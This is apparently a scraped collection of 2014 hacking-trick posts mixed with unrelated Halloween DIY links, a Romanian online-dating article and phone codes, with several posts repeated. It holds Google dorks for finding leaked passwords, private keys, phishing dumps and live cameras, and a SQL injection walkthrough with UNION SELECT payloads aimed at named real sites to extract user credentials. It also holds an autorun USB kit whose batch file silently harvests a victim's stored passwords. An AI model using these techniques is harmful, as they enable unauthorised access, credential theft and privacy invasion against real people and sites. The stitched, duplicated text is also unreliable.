Friday, October 31, 2014

http://worldbesthackers.blogspot.in/2014/09/how-to-hack-gmail-using-phishing.html

http://worldbesthackers.blogspot.in/2014/09/how-to-hack-gmail-using-phishing.html

you can make this Ninja Mask

ZERO EFFORT. If you have a T Shirt, you can make this Ninja Mask! http://www.wikihow.com/Make-a-Ninja-Mask-out-of-a-T-Shirt

NO SEWING REQUIRED.

NO SEWING REQUIRED. DIY Cheap & Easy Tutu! http://www.wikihow.com/Make-a-Non-Sew-Tutu

https://www.facebook.com/frozinetech

https://www.facebook.com/frozinetech

@@@ FIND USERNAMES + PASSWORDS With USING GOOGLE.COM

@@@ FIND USERNAMES + PASSWORDS With USING GOOGLE.COM $$ Remove any space from any Dorks...!! Method 1: Facebook We will be using a google dork to find usernames and passwords of many accounts including Facebook! The Dork: intext:charset_test=email=default_persistent= Enter that into Google, and you will be presented with several sites that have username and passwords lists! Method 2: WordPress! This will look for WordPress backup files Which do contain the passwords, and all data for the site! The Dork: filetype:sql inurl:wp-conten t/backup-* Method 3: WWWBoard! This will look for the user and passwords of WWWBoard users The Dork: inurl:/ wwwboard/ passwd.txt Method 4: FrontPage! This will find all users and passwords, similar to above. The Dork: ext:pwd inurl:(service | authors | administrators | users)"# -FrontPage-" Method 5: Symfony This finds database information and logins The Dork: inurl:config/ databases.yml -trac -trunk -"Google Code"-source -repository Method 6: TeamSpeak This will search for the server.dbs file (A Sqlite database file With the SuperAdmin username and password) The Dork: server-dbs"intitle:index of" Method 7: TeamSpeak 2 This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for"superadmin account info:" The Dork: "inurl:Teamspea k2_RC2/ server.log" Method 8: Get Admin pass Simple dork which looks for all types of admin info The Dork: "admin account info"filetype:log Method 9: Private keys This will find any .pem files which contain private keys. The Dork: filetype:pem pem intext:private And the Ultimate one, the regular directory full of passwords. Method 10: The Dir of Passwords! Simple one! The Dork: intitle:"Index of..etc"passwd

Online dating-ul

Online dating-ul este tot mai popular in Romania si perioada de varf de trafic pentru acest domeniu este intre noiembrie si ianuarie. Intre septembrie 2013 si ianuarie 2014 cautarile de pe mobil pe subiectul online dating au crescut de sase-sapte ori fata de perioada similara a anului precedent, arata un comunicat al agentiei de marketing Today's. Sentimente.ro ramane cel mai popular site, cu circa 100-150.000 de vizitatori unici pe luna, cei mai multi avand varste intre 25 si 44 de ani, iar interesant este ca mai mult de jumatate sunt femei. Prin comparatie, site-ul elmaz.ro are intre 50.000 si 100.000 de vizitatori pe luna, iar procentul celor cu varsta de peste 50 de ani este mai mare (aproximativ 30%) si mai mult de jumatate sunt barbati, scrie hotnews.ro. Celelalte site-uri de profil din Romania au un trafic intre 5.000 pana la 10.000 de vizitatori pe luna. Mai mult, aplicatia sentimente.ro are si cateva zeci de mii de instalari din Play Store pentru Android. Site-urile de dating sunt la mare cautare in Romania si popularitatea acestora creste odata cu venirea toamnei. Halloween, adoptata din Statele Unite ale Americii, este prima sarbatoare importanta a toamnei si in preajma acesteia incep oamenii sa isi caute iubirea sau doar o relatie de scurt timp pe internet. Varfurile de trafic pe care astfel de domenii le intalnesc sunt in perioada noiembrie, decembrie si ianuarie. De asemenea, intre septembrie 2013 si ianuarie 2014 cautarile de pe mobil au crescut de sase-sapte ori fata de perioada similara din 2012-2013, spune Marius Lazarescu, director al Today's. Cand vine vorba de online dating in strainatate, cele mai populare site-uri sunt match.com, OKCupid si PlentyOfFish (pof.com) cu 35 de milioane, 30 de milioane, respectiv 23 milioane de utilizatori pe luna. Cel dintai este insa si unul dintre cele mai vechi, fiind pornit inca din 1995, cand Internetul era la inceput. Pe de alta parte, OKCupid a ales o alta cale decat cea clasica a matrimonialelor. Utilizatorii completeaza chestionare si in functie de raspunsuri le sunt prezentate liste cu oameni care li se potrivesc. Pe mobil, foarte populara este aplicatia Tinder care pe plan mondial are aproximativ 30 de milioane de useri activi. - See more at: http://www.obiectiv.info/pe-ce-site-uri-isi-cauta-romanii-jumatatea_58816.html?htm_source=romaniatv.net&utm_medium=FB&utm_campaign=FB-Pos#sthash.r4OEcLIA.dpuf

Make Jello Shots!

Happy Halloween - Make Jello Shots! P.S. There are 2 Candy Corn Jello Shot recipes on the site... can you find them? http://www.wikihow.com/Make-Jello-Shots

Start at:

Start at: Published on Sep 23, 2014 The explanation by Viurs Egy Ilı ♥ Subscribe to the channel for more explanations O sweet ☺ ıl Http://www.youtube.com/user/EgyptGgeeks ▬ (ஜ ۩۞۩ ஜ) ▬ our ▬ (ஜ ۩۞۩ ஜ) ▬ https: //www.facebook.com/viursanonymo ... ▬ (ஜ ۩۞۩ ஜ) ▬ Groibna ▬ (ஜ ۩۞۩ ஜ) ▬ https: ... //www.facebook.com/groups/anony account Viurs Egy to connect https: //www.facebook.com/ViursEgy.Hac ... ▬ (ஜ ۩۞۩ ஜ) ▬ Note ▬ (ஜ ۩۞۩ ஜ) ▬ secure all programs I want to win followers not to do my acting childish word thanked enough and as long as you do not take advantage of the explanation Tbkhalona Blake

Carving a Pumpkin has never been easier!

wikiHow Carving a Pumpkin has never been easier! Templates included. http://www.wikihow.com/Carve-a-Pumpkin Roast the seeds for a snack! http://www.wikihow.com/Roast-Pumpkin-Seeds

Published on Oct 31, 2014

Start at: Published on Oct 31, 2014 The explanation by Viurs Egy Ilı ♥ Subscribe to the channel for more explanations O sweet ☺ Our ▬ (ஜ ۩۞۩ ஜ) ▬ https: //www.facebook.com/viursanonymo ... ▬ (ஜ ۩۞۩ ஜ) ▬ Groibna ▬ (ஜ ۩۞۩ ஜ) ▬ https: //www.facebook .com / groups / anony ... ▬ (ஜ ۩۞۩ ஜ) ▬ Note ▬ (ஜ ۩۞۩ ஜ) ▬ programs are all safe, I want to gain followers not to do my acting childish word of thanks is enough and as long as you do not take advantage of the explanation Tbkhalona Blake

https://www.youtube.com/watch?v=hKROVKDIuDo فەرموو ئەمەش پرۆگرامەكە كە كێشەی 2MB بایتە زۆر سووكە http://www.mediafire.com/downl…/smb6b9t7kevk8uq/WFHSetup.exe بۆ دڵنیا بوونت لە پاكی پرۆگرام لێرە خۆت بیپشكنە https://www.virustotal.com/en/ یان لێرە دایبگرە سایتی سەرەكی پرۆگرامەكە http://www.wisecleaner.com/wisefolderhider.html ئەم بابەتە بۆ هاورێكانیشت بنێرە بە مەبەستی سوودی گشتی ئامادەكردنی :محمد باڵەك https://www.youtube.com/watch?v=hKROVKDIuDo وا ل

https://www.youtube.com/watch?v=hKROVKDIuDo فەرموو ئەمەش پرۆگرامەكە كە كێشەی 2MB بایتە زۆر سووكە http://www.mediafire.com/downl…/smb6b9t7kevk8uq/WFHSetup.exe بۆ دڵنیا بوونت لە پاكی پرۆگرام لێرە خۆت بیپشكنە https://www.virustotal.com/en/ یان لێرە دایبگرە سایتی سەرەكی پرۆگرامەكە http://www.wisecleaner.com/wisefolderhider.html ئەم بابەتە بۆ هاورێكانیشت بنێرە بە مەبەستی سوودی گشتی ئامادەكردنی :محمد باڵەك https://www.youtube.com/watch?v=hKROVKDIuDo وا ل

(84) Facebook

11 Useful Cloud Computing Tutorials http://www.efytimes.com/e1/fullnews.asp?edid=130891 Want to do your own thing on the cloud? Play around with Twitter or Facebook? Build Facebook apps? Well, these books could be a great way to start with.

FIND USERNAMES + PASSWORDS With USING GOOGLE.COM

@@@ FIND USERNAMES + PASSWORDS With USING GOOGLE.COM $$ Remove any space from any Dorks...!! Method 1: Facebook We will be using a google dork to find usernames and passwords of many accounts including Facebook! The Dork: intext:charset_test=email=default_persistent= Enter that into Google, and you will be presented with several sites that have username and passwords lists! Method 2: WordPress! This will look for WordPress backup files Which do contain the passwords, and all data for the site! The Dork: filetype:sql inurl:wp-conten t/backup-* Method 3: WWWBoard! This will look for the user and passwords of WWWBoard users The Dork: inurl:/ wwwboard/ passwd.txt Method 4: FrontPage! This will find all users and passwords, similar to above. The Dork: ext:pwd inurl:(service | authors | administrators | users)"# -FrontPage-" Method 5: Symfony This finds database information and logins The Dork: inurl:config/ databases.yml -trac -trunk -"Google Code"-source -repository Method 6: TeamSpeak This will search for the server.dbs file (A Sqlite database file With the SuperAdmin username and password) The Dork: server-dbs"intitle:index of" Method 7: TeamSpeak 2 This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for"superadmin account info:" The Dork: "inurl:Teamspea k2_RC2/ server.log" Method 8: Get Admin pass Simple dork which looks for all types of admin info The Dork: "admin account info"filetype:log Method 9: Private keys This will find any .pem files which contain private keys. The Dork: filetype:pem pem intext:private And the Ultimate one, the regular directory full of passwords. Method 10: The Dir of Passwords! Simple one! The Dork: intitle:"Index of..etc"passwd

(29) Pure Hacking - @@@ FIND USERNAMES + PASSWORDS With USING...

@@@ FIND USERNAMES + PASSWORDS With USING GOOGLE.COM $ Remove any space from any Dorks...!! Method 1: Facebook We will be using a google dork to find usernames and passwords of many accounts including Facebook! The Dork: intext:charset_test=email=default_persistent= Enter that into Google, and you will be presented with several sites that have username and passwords lists! Method 2: WordPress! This will look for WordPress backup files Which do contain the passwords, and all data for the site! The Dork: filetype:sql inurl:wp-conten t/backup-* Method 3: WWWBoard! This will look for the user and passwords of WWWBoard users The Dork: inurl:/ wwwboard/ passwd.txt Method 4: FrontPage! This will find all users and passwords, similar to above. The Dork: ext:pwd inurl:(service | authors | administrators | users)"# -FrontPage-" Method 5: Symfony This finds database information and logins The Dork: inurl:config/ databases.yml -trac -trunk -"Google Code"-source -repository Method 6: TeamSpeak This will search for the server.dbs file (A Sqlite database file With the SuperAdmin username and password) The Dork: server-dbs"intitle:index of" Method 7: TeamSpeak 2 This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for"superadmin account info:" The Dork: "inurl:Teamspea k2_RC2/ server.log" Method 8: Get Admin pass Simple dork which looks for all types of admin info The Dork: "admin account info"filetype:log Method 9: Private keys This will find any .pem files which contain private keys. The Dork: filetype:pem pem intext:private And the Ultimate one, the regular directory full of passwords. Method 10: The Dir of Passwords! Simple one! The Dork: intitle:"Index of..etc"passwd

Encryption Server Ngerat Klein # compiler skips Proactive Defense 2015 - YouTube

Start at: Published on Oct 31, 2014 Hello: - Visual Basic download link from his official Download Html: - Http://www.gulfup.com/?MnYypv ---------------------------------- ------ ---- download link Asempela SMART program: - -mn Aldyev Point is not Download Confuser program of Rfie .. Http://ar.rghost.net/58818854 -------------------------------- ----- our link on Facebook encryption My facebook ABoSoso Https://www.facebook.com/Abososo ---------------------------------- ------ ---- to Alqaa and please subscribe to Belknah learned about each new

(225) Facebook

DIY Fake Blood DIY Face Paint DIY Vampire Fangs All 31 Days of Halloween + Bonus Articles! http://wikihow.tumblr.com/…/halloween-is-the-ultimate-diy-h…

(167) Facebook

What is a penetration test? What is penetration testing? Penetration testing, often called “pentesting”,“pen testing”, or “security testing”, is the practice of attacking your own or your clients’ IT systems in the same way a hacker would to identify security holes. Of course, you do this without actually harming the network. The person carrying out a penetration test is called a penetration tester or pentester. Let’s make one thing crystal clear: Penetration testing requires that you get permission from the person who owns the system. Otherwise, you would be hacking the system, which is illegal in most countries – and trust me, you don’t look good in an orange jump suit. In other words: The difference between penetration testing and hacking is whether you have the system owner’s permission. If you want to do a penetration test on someone else's system, we highly recommend that you get written permission. In this case, asking first is definitely better than apologizing later! You can become a penetration tester at home by testing your own server and later make a career out of it. At Rapid7, we have a team of professionals that pentest government and enterprise IT systems for a living. And let me tell you, they enjoy their job!

(61) Facebook

7 Places That Beginner Hackers Will Find Very Useful! http://www.efytimes.com/e1/fullnews.asp?edid=139249 Looking for the best hacking guides? Maybe these will start you off!

(137) Facebook

10 HTML5, CSS3 Tricks That Web Geeks Will Love! http://efytimes.com/e1/fullnews.asp?edid=129392 The web is a huge playground nowadays and the competition is huge. These tricks could give your website an edge.

(131) Facebook

hey guys! I'm back with a brand new airtel host. check this out. You can use it either on mobile or pc. Apn : airtelgprs.com Host : 56789.airtel.in Proxy : 93.115.85.195 Port: 80 More tricks are comming soon........ Stay tuned......... BY PRIYANSHU JHA ‪#‎ADMIN‬

(122) Facebook

50 Open Source Software For Your Windows PC! http://www.efytimes.com/e1/fullnews.asp?edid=130865 ‪#‎Linux‬ invades, are you going to join?

(2) wikiHow - wikiHow added a new photo.

Happy Halloween!!! For the adult Trick-or-Treaters... Make Vodka Gummy Bears. http://www.wikihow.com/Make-Vodka-Gummy-Bears

Hello Friends!

Hello Friends! Welcome on elite cyber security.2day i am going to show you how to make a sql injection.. 1. find vulner able website: use Google.com and use sql dorks : pick a target: I.e: http://www.futuresfins.com/fin-detail.php?id=173 2. check its sql vulnerable or not jus Add ' in the end and hit enter. I.E: http://www.futuresfins.com/fin-detail.php?id=173' syntax error....Good its vulnerable....Now lets start: 3.Get Number of colums: Add order by 1,2,5 .8-- .etc I.e: http://www.futuresfins.com/fin-detail.php?id=173 order by 5-- (no error)page opend. http://www.futuresfins.com/fin-detail.php?id=173 order by 12-- (error) http://www.futuresfins.com/fin-detail.php?id=173 order by 11-- (no error) it means there are 11 colums in this website... 4.union of all columns.. it will show you vulnerable columns that you can use... http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,2,3,4,5,6,7,8,9,10,11-- other: http://www.cti-pfan.net/privacy.php?id=-9 union select all 1,2,3,4,5,6,7,8-- Note: always Add - befor id number i.e:php?id=-173 as you can see here is 2 show on secreen...it mean 2 colum is vulnerable... 5.check version : replace 2 with: @@version I.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,@@version,3,4,5,6,7,8,9,10,11-- Hmmm its above 5... 6. check Data base name: just replace @@version with concat(database()) I.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,concat(database()),3,4,5,6,7,8,9,10,11-- here is Data base name: Future_future2 save it... 7.Now get table name: Replace concat(database()) with: group_concat(table_name) and in the end add this after colums: from information_schema.tables where table_schema=database()-- i.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()-- it show all tables name...Our Table Is There "users" 8.Here users table here...Go to this website: http://www.swingnote.com/tools/texttohex.php and enter here users and copy the HEX code: 7573657273 9.Find column name: http://www.cti-pfan.net/privacy.php?id=-9 union select all 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()-- replace table_name with (column_name) and add information_schema.columns 10.Now get usersname and password: i.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,group_concat(Username,0x3a,Password),3,4,5,6,7,8,9,10,11 from users-- Bingoooooooo...you Got user name and pass: 10:Find admin panel.. some common login pages... http://www.futuresfins.com/login.html http://www.futuresfins.com/admin.html Enjoy..

(12) Google as A Hacking Tool Global search engine... - Cybercells tricks

Google as A Hacking Tool Global search engine giant Google is priceless. We use it on a more than daily basis for all our search needs. Whether you're looking for that fancy word or the location of a good restaurant, you'll get everything with Google search and more. Enough on the good part. Did you know Google has a dark side too? Did you know Google can be used to gain access to confidential information or download free music? Here's how... 1.Hacking Security Cameras! You might have noticed many security cameras monitoring places like parking lots, college campus, road traffic etc (and yes, some of them work!). Did you know you can use Google to hack into these cameras to view images captured by these cameras in real time. How do you do it? Well simply open the Google search box and type in the following query: inurl:”viewerframe?mode=motion” You will get a search result that will give you access to live cameras with full controls (move the camera in all the four directions, perform zoom in and zoom out). The above mentioned query usually gives access to cameras with less refresh rate. In case you're looking for faster refresh rates: intitle:”Live View / – AXIS” 2. Hacking Personal and Confidential Documents! You can access an email repository containing personal and confidential documents (CVs for instance) using Google. Simply open the Google search box and type in the following query: intitle:”curriculum vitae” “phone * * *” “address *” “e-mail” To access a list of excel documents which contains contact details including email addresses of people: filetype:xls inurl:”email.xls” To access documents potentially containing information on bank accounts, financial summaries and credit card numbers: intitle:index.of finances.xls 3. Gaining Access to Free Stuffs! If you're looking to download free music, simply enter the following query on Google search box and hit enter: “?intitle:index.of?mp3 artist name“ If you're looking to download free ebooks: “?intitle:index.of?pdf book name“ ATTENTION PLZ: Support The Page By Like, Share, Comments! Tnx

(46) Facebook

Kali Tools List with Short Description ‪#‎Download4FREE‬!!! ‪#‎iExplo1t‬ ‪#‎Winfreebooks‬ ‪#‎freebooks‬ ‪#‎amazon‬ ‪#‎read‬ http://ebooks.iexplo1t.com/…/…/KaliToolsListDescription.html

(39) Facebook

Google as A Hacking Tool Global search engine giant Google is priceless. We use it on a more than daily basis for all our search needs. Whether you're looking for that fancy word or the location of a good restaurant, you'll get everything with Google search and more. Enough on the good part. Did you know Google has a dark side too? Did you know Google can be used to gain access to confidential information or download free music? Here's how... 1.Hacking Security Cameras! You might have noticed many security cameras monitoring places like parking lots, college campus, road traffic etc (and yes, some of them work!). Did you know you can use Google to hack into these cameras to view images captured by these cameras in real time. How do you do it? Well simply open the Google search box and type in the following query: inurl:”viewerframe?mode=motion” You will get a search result that will give you access to live cameras with full controls (move the camera in all the four directions, perform zoom in and zoom out). The above mentioned query usually gives access to cameras with less refresh rate. In case you're looking for faster refresh rates: intitle:”Live View / – AXIS” 2. Hacking Personal and Confidential Documents! You can access an email repository containing personal and confidential documents (CVs for instance) using Google. Simply open the Google search box and type in the following query: intitle:”curriculum vitae” “phone * * *” “address *” “e-mail” To access a list of excel documents which contains contact details including email addresses of people: filetype:xls inurl:”email.xls” To access documents potentially containing information on bank accounts, financial summaries and credit card numbers: intitle:index.of finances.xls 3. Gaining Access to Free Stuffs! If you're looking to download free music, simply enter the following query on Google search box and hit enter: “?intitle:index.of?mp3 artist name“ If you're looking to download free ebooks: “?intitle:index.of?pdf book name“ ATTENTION PLZ: Support The Page By Like, Share, Comments! Tnx

(17) new magic code @*[223317557774374:] remove * and... - ALL Tips And Tricks by ADNAN

new magic code @*[223317557774374:] remove * and cmmnt and u will see this 。  ☆    。★    。   ☆    。★。   ★。     ☆   。    ☆。    ☆    ★。。  ☆     。★    。   ☆    。★。   ★。    ☆    。    ☆。    ☆    ★。。  ☆    。★     。   ☆    。★。   ★。    ☆   。     ☆。    ☆    ★。。  ☆    。★    。    ☆    。★。   ★。    ☆   。    ☆。     ☆    ★。。  ☆    。★    。   ☆     。★。   ★。    ☆   。    ☆。    ☆     ★。 and if u want to make it coulrful so before the code write this <fg=bd0007ff*> or <fg=bfd700f0*> without *

(12) Guys recently we explained what is Penetration... - Cybercells tricks

Guys recently we explained what is Penetration Tests. Now we are going to explain Types of Penetration Tests Network services test: This is one of the most common types of penetration tests, and involves finding target systemson the network, searching for openings in their base operating systems and available network services,and then exploiting them remotely. Some of these nelwork service penetration tests take place remotely across the Internet, targeting the organrzation’s perimeter networks. Others are launched locally, from the target’s own business facilities, to assess the security of their internal network or the DMZ from within, seeing what kinds of vulnerabilities an internal user could learn. Client-side test: This kind of penetration test is intended to find vulnerabilities in and exploit client-side software, such as web browsers, media players, document editing programs, etc. Web application test: These penetration tests look for security vulnerabilities in the web-based applications and programs deployed and installed on the target environment. Remote dial-up war dial: These penetration tests look for modems in a target environment, and normally involve password guessing or brute forcing to login to systems connected to discovered modems. Wireless security test: These penetration tests involve discovering a target’s physical environment to find unauthorized wireless access points or authorized wireless access points with security weaknesses. Social engineering test: This type of penetration test involves attempting to make a user into revealing sensitive information such as a password or any other sensitive data. These tests are often conducted over the phone, targeting selected help desks, users or employees, evaluating processes, procedures, and user awareness.

(142) Facebook

200+ Videos That Will Make You A Master Hacker! http://efytimes.com/e1/fullnews.asp?edid=135212 Watching a pro at work is sometimes way more productive than reading pages and pages of text.

(176) Facebook

Top free PC programs everyone should have There are millions of free and open source projects available, many of them better than any commercially available product. Below is a short listing of what we think is the best out there, broken down into ten categories. Read and download@:-http://bit.ly/1wk7Hlt

(179) Facebook

Day 31. Last minute DIY Halloween Costumes - only tape or pins! Make a Ninja Mask out of a T Shirt: http://bit.ly/1i78NsM Make a Toga out of a Bedsheet: http://bit.ly/U9VMqE Make a Glow Stick Costume: http://bit.ly/1DrZifK Make a Non Sew Tutu: http://bit.ly/ZZoxsJ

(15) Nokia Mobiles Secret Codes :... - Cybercells tricks

Nokia Mobiles Secret Codes : ************************************ On the main screen type : ******************************** *#06# for checking the IMEI (International Mobile Equipment Identity). *#7780# reset to factory settings. *#67705646# This will clear the LCD display (operator logo). *#0000# To view software version. *#2820# Bluetooth device address. *#746025625# Sim clock allowed status. *#62209526# – Display the MAC address of the WLAN adapter. This is available. *#92702689# – takes you to a secret menu where you may find some of the information below: 1. Displays Serial Number. 2. Displays the Month and Year of Manufacture. 3. Displays the date where the phone was purchased, 4. Displays the date of the last repair – if found (0000) 5. Shows life timer of phone (time passes since last start) *#3370# – Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though. *#3370* – (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network. *#4720# – Half Rate Codec activation. *#4720* – Half Rate Codec deactivation. The phone will automatically restart *#7328748263373738# resets security code. Default security code is 12345 *#1471# Last call (Only Vodafone) *#21# Allows you to check the number that “All Calls” are diverted to *#30# Lets you see the private number *#43# Allows you to check the “Call Waiting” status of your phone. *#62# Allows you to check the number that “Divert If Unreachable (no service)” calls are diverted to *#67# Allows you to check the number that “On Busy Calls” are diverted to *#67705646# Removes operator logo on 3310 & 3330 *#73# Reset phone timers and game scores *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible *#7780# Restore factory settings *#8110# Software version for the nokia 8110 *#92702689# Displays – 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data 12345 This is the default security code. Hit Like if it was useful.

(127) Facebook

10 Powerful SQL Injection Tools That Penetration Testers Can Use http://efytimes.com/e1/fullnews.asp?edid=132535 Enough with the regular Nmap, Nessus and other hacking tools. Let's take a look at some specialised SQL Injection related tools!

Interesting facts about browsers - YouTube

Published on Oct 30, 2014 For private browsing in Google Chrome:- ctrl+shift+n For private browsing in Mozzila Firefox:- ctrl+shift+p

(135) Facebook

50 Free System And Network Admin Tools http://efytimes.com/e1/fullnews.asp?edid=131076 What would an admin be without his handy tools!

Cracking WPA & WPA2 key with Aircrack-ng on Kali Linux - YouTube

Start at: Published on May 30, 2013 VISIT MY PAGE ON FACEBOOK: http://www.facebook.com/BackTrack.Fan... Cupp WordList Maker Tool On Backtrack 5 R3 http://www.youtube.com/watch?v=U0kAE3... VISIT: http://securitygeeks.net/ TUTORIAL By Cyb3rw0rM CONTACT ME: Cyb3rw0rm@hotmail.com

(50) Facebook

Cracking WPA & WPA2 key with Aircrack-ng on Kali Linux VIDEO TUTORIAL: http://anonymousbosnia.com/Aircrack-ng.php CUPP WORDLIST MAKER: http://anonymousbosnia.com/Cupp.php READ MORE: http://www.backtrack-pages.com/…/cracking-wpa-wpa2-key-with…

https://www.youtube.com/user/OfficialOsVirus/videos

https://www.youtube.com/user/OfficialOsVirus/videos

HOW TO SNIFF (HACK) STORED PASSWORDS OF ANY COMPUTER THROUGH USB DRIVE

What is the Logic behind this Hacking Trick? As we all know that whenever we visits any website then we have to enter username and password. If we have to visit the site daily then to avoid entering the username and password again and again we just check on remember me on that time. By checking remember me option we allows windows to save our username and password. And here in this trick we will get the password by a USB Drive i.e. we need not to open any browser. Which passwords we can hack by using this hacking tool? All passwords which are saved in any windows browser, can be hacked using this trick. ex: Outlook Express password, Yahoo Messenger password etc. What things we will need? IE PassView: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0 MessenPass: MessenPass is a password recovery tool that reveals the passwords of following most popular Instant Messenger programs: * MSN Messenger * Windows Messenger * Windows Live Messenger * Yahoo Messenger (Versions 5.x and 6.x) * Google Talk etc * AOL Messenger provided with Netscape 7 Mail PassView: Mail PassView is the password recovery tool that reveals the password and other account details for the following email clients: * Outlook Express * Microsoft Outlook 2000 (POP3 and SMTP Accounts only) * Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP and SMTP Accounts) * Windows Mail * Yahoo! Mail - If the password is saved in Yahoo! Messenger application. * IncrediMail * Eudora * Netscape Mail * Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application. * Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk & etc. In Mail PassView for each email account, the following fields are displayed: Account Name, Application, Email, Server, Server Type (POP3/IMAP/SMTP), User Name and Password. PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Protected Storage PassView: Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage. ChromePass: It is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. You can select one or more items and then save them into text/html/xml file or copy them to the clipboard. I have uploaded all these hacking tools in one single pack click the below download button to download. >>DOWNLOAD << Now follow the steps to create USB Hacking kit: 1. Download all the 6 tools, extract and copy only the executables (.exe) files to your USB Drive. For ex: Copy the files named as - iepv.exe, mspass.exe, mailpv.exe, passwordfox.exe, pspv.exe, chromepass.exe Copy all above files to your USB Drive and make them hidden so that no one will be able to notice them. 2. Now open a Notepad and write the following text into it [autorun] open=launch.bat ACTION= Perform a Virus Scan Save it as autorun.inf 3. Now open an another Notepad window and copy the following text onto it start iepv.exe /stext iepv.txt start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start passwordfox.exe /stext passwordfox.txt start pspv.exe /stext pspv.txt start ChromePass.exe /stext chromePass.txt Now save the file as launch.bat Now copy both files autorun.inf & launch.bat to your pendrive. Now your USB hacking kit is ready to use. You can use this pen-drive on any computer to sniff the stored passwords. Just follow the steps given below: 1. Insert the pendrive to the target PC the autorun window will pop-up. (This is because, we have created an autorun in pendrive). 2. In the pop-up window, user must select the first option (Perform a Virus Scan). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the form of .txt files in the pendrive. 4. Now just plug out the pendrive so that your victim will not be able to notice what you have done with his computer. And see the stored passwords in the .txt files Note that this hacking trick will only reveal the passwords stored in that computer. If you have any doubts regarding the hack please pass your comments for further doubts and clarifications.

MAKE YOUR OWN PROGRAM TO CREATE WIFI HOSTPOT COMPATIBLE WITH WINDOWS 8

Most of us have wifi in our laptop computer but when we want to share our wifi with our friends we spend money to buy software which create hostpot network on your laptop.But now you dont need to buy or waste money to buy these types of software you can create your own wifi hostpot network by using batch program,I will tell you how can you do this,so follow the steps below STEP 1: Open your notepad STEP 2: Copy and paste the code to your notepad given below ___________________________________________________________________ @echo off if not exist c:\users\%username% goto err1 :main cls echo. echo. echo Wi-Fi Hotspot Compatible with Windows 8 - echo By Tekspot(techingspot.tk) echo -- echo. echo. echo. echo 1. Create a Hotspot echo 2. Show Network Settings echo 3. Show Drivers echo 4. Start Network echo 5. Stop Network echo 6. Help echo 7. About echo 8. Quit echo. set /p select=Enter the number of your choice: if %select% == 1 goto :create if %select% == 2 goto :shownet if %select% == 3 goto :showdr if %select% == 4 goto :start if %select% == 5 goto :stop if %select% == 6 goto :help if %select% == 7 goto :about if %select% == 8 goto :exit echo Invalid input! pause cls goto :main :create cls echo Create Your Network Preference echo -- echo Tips: SSID is the uniquie identification name of your hotspot echo. set /p ssid=Enter your desired SSID: cls echo Create Your Network Preference echo -- echo Tips: The key would be the password to access your wireless network. echo The key must have 8 or more characters. echo. set /p key=Enter your desired Key: cls netsh wlan set hostednetwork mode=allow ssid=%ssid% key=%key% netsh wlan start hostednetwork echo. echo Make sure that the ICS feature is enabled for the newly created Wi-Fi so that the internet connection is shared to others. Go to Help for more info. echo. pause goto :main :showdr cls netsh wlan show drivers pause goto :main :shownet cls netsh wlan show hostednetwork pause goto :main :start cls netsh wlan start hostednetwork pause goto :main :stop cls netsh wlan stop hostednetwork pause goto :main :help cls echo Help Section (F.A.Q) echo -- echo 1. How to enable ICS (Internetion Connection Sharing) settings? echo. echo Answer: Make sure that the ICS feature is enabled for the newly created Wi-Fi so echo that the internet connection is shared to others. To do this, go to Network ~ echo Network Connections, and open Properties dialog of network device (which is connected to the internet). On sharing tab, enable 'Allow other network users to connect through this computer's Internet connection', and then choose the newly created ad-hoc/Wi-Fi echo connection from the list. echo. echo 2. Why I can't create connection? echo. echo Answer: Make sure that your laptop supports Hosted Network. To check this, echo go to choose 'Show Drivers' from the main menu and see if the 'Hosted nework supported' is set to Yes. pause goto :main :about cls echo. echo. echo. echo. echo. echo. echo. echo Wi-Fi Hotspot Creator echo. echo By tekspot (techingspot.tk) echo. echo. echo. pause>nul goto :main :err1 echo You need to be on windows pause>nul :exit exit ______________________________________________________________________ STEP 3: Now save this as hotspot.bat STEP 4:Now go to your saved directory click on the batch file now the batch program will start and select your desired option to command and start your wifi hotspot

Google dorking

Hello,most people may heard about phishing sites,when ever victim login with their password then his login sent to http://phshingsite.com/password.text/ and you may know that http://phisingsite.com/passwords.txt isn't an password protected page and everybody can access when they go to the URL. Today i am going to tell you that how we can get lots of user passwords and their email by using google dork. So what is google dork?A google dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries. That description includes information that is not intended for public viewing but that has not been adequately protected. Here is how can you get the password STEP 1 :Go to google STEP 2: enter this dork on search :search for this : filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test=" STEP 3: Open your desired link use all link from first to last) this all are phishing site link where the victim password saved NOW WHEN YOU WILL CLICK ANY OF THE LINK YOU 